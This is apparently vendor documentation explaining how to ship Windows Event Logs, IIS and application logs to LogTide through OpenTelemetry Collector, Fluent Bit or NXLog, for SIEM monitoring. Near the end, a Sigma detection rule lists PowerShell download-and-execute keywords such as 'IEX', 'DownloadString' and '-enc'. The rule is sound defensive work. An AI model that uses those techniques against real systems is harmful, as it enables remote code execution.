Windows Endpoint Monitoring
Collect logs from Windows servers and workstations including Event Logs, IIS, and application logs. Perfect for SIEM labs and enterprise monitoring.
SIEM Lab Ready
This guide covers Windows log collection for security monitoring and SIEM use cases. All methods use LogTide's native OpenTelemetry (OTLP) endpoint for log ingestion.
Overview
LogTide can receive logs from Windows endpoints through several methods. All options send logs via OTLP (OpenTelemetry Protocol) or HTTP to LogTide's API.
Official CNCF project with native Windows support.
Lightweight agent with Windows Event Log support.
Enterprise-grade log collector with free Community Edition.
Option 1: OpenTelemetry Collector
The OpenTelemetry Collector is the recommended approach for Windows log collection. It supports Windows Event Logs natively and sends data directly to LogTide's OTLP endpoint.
1. Download the Collector
Download the latest Windows release from the
OpenTelemetry Collector releases page
. Choose the otelcol-contrib distribution
which includes the Windows Event Log receiver.
# Download using PowerShell (adjust version as needed)
$version = "0.96.0"
$url = "https://github.com/open-telemetry/opentelemetry-collector-releases/releases/download/v$version/otelcol-contrib_$($version)_windows_amd64.tar.gz"
Invoke-WebRequest -Uri $url -OutFile "otelcol-contrib.tar.gz"
# Extract
tar -xzf otelcol-contrib.tar.gz
# Move to Program Files
New-Item -ItemType Directory -Force -Path "C:\Program Files\OpenTelemetry Collector"
Move-Item otelcol-contrib.exe "C:\Program Files\OpenTelemetry Collector\"2. Create Configuration File
Create C:\Program Files\OpenTelemetry Collector\config.yaml:
# OpenTelemetry Collector Configuration for Windows
# Sends logs to LogTide via OTLP
receivers:
# Windows Event Log receiver
windowseventlog:
channel: Application
windowseventlog/security:
channel: Security
windowseventlog/system:
channel: System
processors:
# Batch logs for efficient transmission
batch:
timeout: 5s
send_batch_size: 100
# Add resource attributes
resource:
attributes:
- key: host.name
from_attribute: computer
action: upsert
- key: service.name
value: "windows-eventlog"
action: insert
exporters:
# Send to LogTide Cloud
otlphttp/logtide:
endpoint: https://api.logtide.dev
headers:
X-API-Key: "lp_your_api_key_here"
# Or send to self-hosted LogTide
# otlphttp/logtide:
# endpoint: http://your-logtide-server:8080
# headers:
# X-API-Key: "lp_your_api_key_here"
# tls:
# insecure: true
service:
pipelines:
logs:
receivers:
- windowseventlog
- windowseventlog/security
- windowseventlog/system
processors: [resource, batch]
exporters: [otlphttp/logtide]3. Install as Windows Service
Run PowerShell as Administrator:
# Create the Windows service
sc.exe create "OpenTelemetry Collector" binPath= ""C:\Program Files\OpenTelemetry Collector\otelcol-contrib.exe" --config="C:\Program Files\OpenTelemetry Collector\config.yaml"" start= auto
# Start the service
sc.exe start "OpenTelemetry Collector"
# Check status
sc.exe query "OpenTelemetry Collector"Verify Installation
After starting the service, check LogTide for incoming logs.
You should see Windows Event Logs appearing within a few seconds.
Filter by service:windows-eventlog to find them.
Option 2: Fluent Bit for Windows
Fluent Bit has native Windows support and can collect Windows Event Logs, file-based logs, and more.
1. Download and Install
Download the Windows installer from Fluent Bit's official download page .
# Download using PowerShell (adjust version as needed)
$version = "3.2.2"
$url = "https://packages.fluentbit.io/windows/fluent-bit-$version-win64.exe"
Invoke-WebRequest -Uri $url -OutFile "fluent-bit-installer.exe"
# Run installer (or use silent install)
.\fluent-bit-installer.exe /S2. Configure Fluent Bit
Edit C:\Program Files\fluent-bit\conf\fluent-bit.conf:
[SERVICE]
Flush 5
Daemon Off
Log_Level info
# =============================================================================
# INPUT - Windows Event Logs
# =============================================================================
[INPUT]
Name winlog
Channels Application,System,Security
Interval_Sec 1
Tag windows.eventlog
# =============================================================================
# FILTER - Add metadata
# =============================================================================
[FILTER]
Name record_modifier
Match windows.*
Record service windows-eventlog
Record hostname ${COMPUTERNAME}
[FILTER]
Name lua
Match windows.*
script C:\Program Files\fluent-bit\conf\map_level.lua
call map_windows_level
# =============================================================================
# OUTPUT - Send to LogTide via OTLP
# =============================================================================
[OUTPUT]
Name opentelemetry
Match *
# LogTide Cloud
Host api.logtide.dev
Port 443
Uri /v1/otlp/logs
Tls On
Header X-API-Key lp_your_api_key_here
# For self-hosted LogTide, use:
# Host your-logtide-server
# Port 8080
# Tls Off3. Create Level Mapping Script
Create C:\Program Files\fluent-bit\conf\map_level.lua:
-- Map Windows Event Log levels to LogTide levels
-- Windows levels: 1=Critical, 2=Error, 3=Warning, 4=Information, 5=Verbose
function map_windows_level(tag, timestamp, record)
local level_map = {
[1] = "critical",
[2] = "error",
[3] = "warn",
[4] = "info",
[5] = "debug"
}
local win_level = record["Level"] or record["level"] or 4
record["level"] = level_map[win_level] or "info"
-- Use Message field as the log message
if record["Message"] then
record["message"] = record["Message"]
end
-- Extract source/provider as service if available
if record["SourceName"] then
record["service"] = record["SourceName"]
end
return 1, timestamp, record
end4. Start the Service
# Start Fluent Bit service
sc.exe start fluent-bit
# Or restart if already running
sc.exe stop fluent-bit
sc.exe start fluent-bit
# Check status
sc.exe query fluent-bitOption 3: NXLog
NXLog Community Edition is a free, enterprise-grade log collector with excellent Windows support. It can send logs to LogTide's HTTP API.
1. Download and Install
Download NXLog Community Edition from nxlog.co and run the installer.
2. Configure NXLog
Edit C:\Program Files\nxlog\conf\nxlog.conf:
## NXLog Configuration for LogTide
define ROOT C:\Program Files\nxlog
define CERTDIR %ROOT%\cert
define CONFDIR %ROOT%\conf
define LOGDIR %ROOT%\data
Moduledir %ROOT%\modules
CacheDir %ROOT%\data
Pidfile %ROOT%\data\nxlog.pid
SpoolDir %ROOT%\data
LogFile %ROOT%\data\nxlog.log
<Extension json>
Module xm_json
</Extension>
# Windows Event Log input
<Input eventlog>
Module im_msvistalog
Query <QueryList>\
<Query Id="0">\
<Select Path="Application">*</Select>\
<Select Path="System">*</Select>\
<Select Path="Security">*</Select>\
</Query>\
</QueryList>
</Input>
# Transform to LogTide format
<Processor transform>
Module pm_null
<Exec>
# Map Windows level to LogTide level
if $EventType == "ERROR" $level = "error";
else if $EventType == "WARNING" $level = "warn";
else if $EventType == "CRITICAL" $level = "critical";
else $level = "info";
# Set required fields
$service = $SourceName;
$message = $Message;
$time = strftime($EventTime, "%Y-%m-%dT%H:%M:%SZ");
# Add metadata
$metadata = to_json({"EventID": $EventID, "Channel": $Channel, "Computer": $Computer});
</Exec>
</Processor>
# Output to LogTide HTTP API
<Output logtide>
Module om_http
URL https://api.logtide.dev/api/v1/ingest/single
# For self-hosted: http://your-server:8080/api/v1/ingest/single
AddHeader X-API-Key: lp_your_api_key_here
AddHeader Content-Type: application/json
<Exec>
# Format as JSON for LogTide
$raw_event = to_json({"time": $time, "level": $level, "service": $service, "message": $message, "metadata": $metadata});
</Exec>
</Output>
# Route: eventlog -> transform -> logtide
<Route 1>
Path eventlog => transform => logtide
</Route>3. Start NXLog Service
# Start NXLog service
net start nxlog
# Check status
sc.exe query nxlogCollecting Windows Event Logs
Windows Event Logs are the primary source for system and security monitoring. Here are the key channels to collect for SIEM use cases:
| Channel | Description | SIEM Priority |
|---|---|---|
| Security | Logon events, privilege use, audit policy changes | Critical |
| System | Service starts/stops, driver issues, hardware events | High |
| Application | Application errors, warnings, and information | Medium |
| Microsoft-Windows-Sysmon/Operational | Process creation, network connections, file changes (requires Sysmon) | Critical |
| Microsoft-Windows-PowerShell/Operational | PowerShell script execution, module loading | Critical |
| Microsoft-Windows-Windows Defender/Operational | Antivirus detections, scan results | High |
Install Sysmon for Enhanced Visibility
For security monitoring, install Microsoft Sysmon to capture process creation, network connections, and file modifications. Use the SwiftOnSecurity config as a starting point.
Extended Event Log Collection (OpenTelemetry)
To collect additional channels with OpenTelemetry Collector, add more receivers:
receivers:
# Sysmon logs (requires Sysmon installed)
windowseventlog/sysmon:
channel: Microsoft-Windows-Sysmon/Operational
# PowerShell logs
windowseventlog/powershell:
channel: Microsoft-Windows-PowerShell/Operational
# Windows Defender
windowseventlog/defender:
channel: Microsoft-Windows-Windows Defender/Operational
# Remote Desktop
windowseventlog/rdp:
channel: Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
service:
pipelines:
logs:
receivers:
- windowseventlog
- windowseventlog/security
- windowseventlog/system
- windowseventlog/sysmon
- windowseventlog/powershell
- windowseventlog/defender
- windowseventlog/rdp
processors: [resource, batch]
exporters: [otlphttp/logtide]Collecting IIS Logs
IIS (Internet Information Services) logs can be collected using file-based input.
By default, IIS logs are stored in C:\inetpub\logs\LogFiles.
Fluent Bit IIS Configuration
Add this to your Fluent Bit configuration:
# IIS Log Collection
[INPUT]
Name tail
Path C:\inetpub\logs\LogFiles\W3SVC*\*.log
Tag iis.access
Read_from_Head False
Refresh_Interval 5
Skip_Long_Lines On
# Skip IIS comment lines (start with #)
Exclude_Path *.old
[FILTER]
Name parser
Match iis.*
Key_Name log
Parser iis_log
[FILTER]
Name record_modifier
Match iis.*
Record service iis
Record level info
[OUTPUT]
Name opentelemetry
Match iis.*
Host api.logtide.dev
Port 443
Uri /v1/otlp/logs
Tls On
Header X-API-Key lp_your_api_key_hereIIS Parser
Add this parser to your parsers config:
# IIS W3C Log Format Parser
[PARSER]
Name iis_log
Format regex
Regex ^(?<date>[^ ]+) (?<time>[^ ]+) (?<s_ip>[^ ]+) (?<cs_method>[^ ]+) (?<cs_uri_stem>[^ ]+) (?<cs_uri_query>[^ ]+) (?<s_port>[^ ]+) (?<cs_username>[^ ]+) (?<c_ip>[^ ]+) (?<cs_user_agent>[^ ]+) (?<cs_referer>[^ ]+) (?<sc_status>[^ ]+) (?<sc_substatus>[^ ]+) (?<sc_win32_status>[^ ]+) (?<time_taken>[^ ]+)$
Time_Key time
Time_Format %H:%M:%SCollecting Application Logs
For custom application logs stored in files, use the tail input:
# Custom application log files
[INPUT]
Name tail
Path C:\Apps\MyApp\logs\*.log
Tag app.myapp
Read_from_Head False
Refresh_Interval 5
# For JSON formatted logs
Parser json
[INPUT]
Name tail
Path C:\Apps\AnotherApp\logs\app.log
Tag app.anotherapp
Read_from_Head False
# For plain text logs
Multiline On
Parser_Firstline multiline_start
[FILTER]
Name record_modifier
Match app.myapp
Record service myapp
[FILTER]
Name record_modifier
Match app.anotherapp
Record service anotherappSecurity Monitoring
Once Windows logs are flowing into LogTide, you can use Sigma rules for security detection. Here are some example queries for common security events:
Event ID 4625 - Failed login attempts
service:windows-eventlog AND metadata.EventID:4625Event ID 7045 - New service installed
service:windows-eventlog AND metadata.EventID:7045Sysmon Event ID 1 - Process created
service:Sysmon AND metadata.EventID:1PowerShell script block logging
service:PowerShell AND level:warnExample Sigma Rule: Suspicious PowerShell
title: Suspicious PowerShell Command
status: stable
logsource:
product: windows
service: powershell
detection:
selection:
message|contains:
- 'Invoke-Expression'
- 'IEX'
- 'DownloadString'
- 'EncodedCommand'
- '-enc'
condition: selection
level: highTroubleshooting
- • Check service is running:
sc.exe query "service-name" - • Verify API key is correct in config file
- • Check logs: OpenTelemetry logs to Windows Event Log, Fluent Bit to
C:\Program Files\fluent-bit\log - • Test network connectivity to LogTide endpoint
- • Ensure Windows Firewall allows outbound HTTPS (443) or HTTP (8080)
The Security event log requires elevated permissions. Ensure the service runs as:
- • Local System account, or
- • A user in the "Event Log Readers" group
# Add service account to Event Log Readers
net localgroup "Event Log Readers" "NT AUTHORITY\LOCAL SERVICE" /add- • Increase batch size and timeout to reduce API calls
- • Filter out noisy/unnecessary event IDs
- • Use XPath queries to limit collected events
Test Log Ingestion
Generate a test event to verify the pipeline:
# Write a test event to Application log
Write-EventLog -LogName Application -Source "Application" -EventId 1000 -EntryType Information -Message "Test log message for LogTide"
# Check LogTide for the message (filter by service:Application)You're All Set!
Your Windows endpoint is now sending logs to LogTide. Use the search and filter features to explore your logs, set up alerts for important events, and enable Sigma rules for security monitoring.
Related documentation: OpenTelemetry Integration • Syslog Integration • API Reference